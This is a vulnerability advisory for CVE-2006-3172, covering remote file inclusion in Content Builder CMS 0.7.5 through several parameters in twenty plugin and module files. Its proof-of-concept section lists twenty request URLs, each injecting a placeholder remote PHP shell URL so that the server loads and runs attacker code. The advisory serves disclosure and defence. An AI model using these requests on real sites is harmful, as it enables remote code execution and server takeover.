DEFTCODE( 2 )

GPG - 2048R/6D378CAF

CVE-2006-3172 – Content-Builder CMS 0.7.5 - Remote Command Execution

Vendor

http://www.content-builder.de/

phpCMS is more than just a content management system: it is also a templating engine and an application framework.

Description

Multiple PHP Remote File Inclusion (RFI) vulnerabilities in Content Builder 0.7.5 allow remote attackers to execute arbitrary PHP code via a URL with a trailing slash (/) character in the

  1. lang_path parameter to
    • (a) cms/plugins/col_man/column.inc.php,
    • (b) cms/plugins/poll/poll.inc.php,
    • (c) cms/plugins/user_managment/usrPortrait.inc.php,
    • (d) cms/plugins/user_managment/user.inc.php,
    • (e) cms/plugins/media_manager/media.inc.php,
    • (f) cms/plugins/events/permanent.eventMonth.inc.php,
    • (g) cms/plugins/events/events.inc.php,
    • (h) cms/plugins/newsletter2/newsletter.inc.php;
  2. path[cb] paramter to
    • (i) modules/guestbook/guestbook.inc.php,
    • (j) modules/shoutbox/shoutBox.php,
    • (k) modules/sitemap/sitemap.inc.php; and the
  3. rel parameter to
    • (l) modules/download/overview.inc.php,
    • (m) modules/download/detailView.inc.php,
    • (n) modules/article/fullarticle.inc.php,
    • (o) modules/article/comments.inc.php,
    • (p) modules/article2/overview.inc.php,
    • (q) modules/article2/fullarticle.inc.php,
    • (r) modules/article2/comments.inc.php,
    • (s) modules/headline/headlineBox.php,
    • (t) modules/headline/showHeadline.inc.php.

Proof of Concept

~ stands for [php-shell-url]

http://example/[cb_path]/cms/plugins/col_man/column.inc.php?lang_path= ~/ http://example/[cb_path]/cms/plugins/poll/poll.inc.php?lang_path= ~/ http://example/[cb_path]/cms/plugins/user_managment/usrPortrait.inc.php?lang_path= ~/ http://example/[cb_path]/cms/plugins/user_managment/user.inc.php?lang_path= ~/ http://example/[cb_path]/cms/plugins/media_manager/media.inc.php?lang_path= ~/ http://example/[cb_path]/cms/plugins/events/permanent.eventMonth.inc.php?lang_path= ~/ http://example/[cb_path]/cms/plugins/events/events.inc.php?lang_path= ~/ http://example/[cb_path]/cms/plugins/newsletter2/newsletter.inc.php?lang_path= ~/ http://example/[cb_path]/modules/guestbook/guestbook.inc.php?path[cb]= ~/ http://example/[cb_path]/modules/shoutbox/shoutBox.php?path[cb]= ~/ http://example/[cb_path]/modules/download/overview.inc.php?rel= ~/ http://example/[cb_path]/modules/download/detailView.inc.php?rel= ~/ http://example/[cb_path]/modules/sitemap/sitemap.inc.php?path[cb]= ~/ http://example/[cb_path]/modules/article/fullarticle.inc.php?rel= ~/ http://example/[cb_path]/modules/article/comments.inc.php?rel= ~/ http://example/[cb_path]/modules/article2/overview.inc.php?rel= ~/ http://example/[cb_path]/modules/article2/fullarticle.inc.php?rel= ~/ http://example/[cb_path]/modules/article2/comments.inc.php?rel= ~/ http://example/[cb_path]/modules/headline/headlineBox.php?rel= ~/ http://example/[cb_path]/modules/headline/showHeadline.inc.php?rel= ~/

References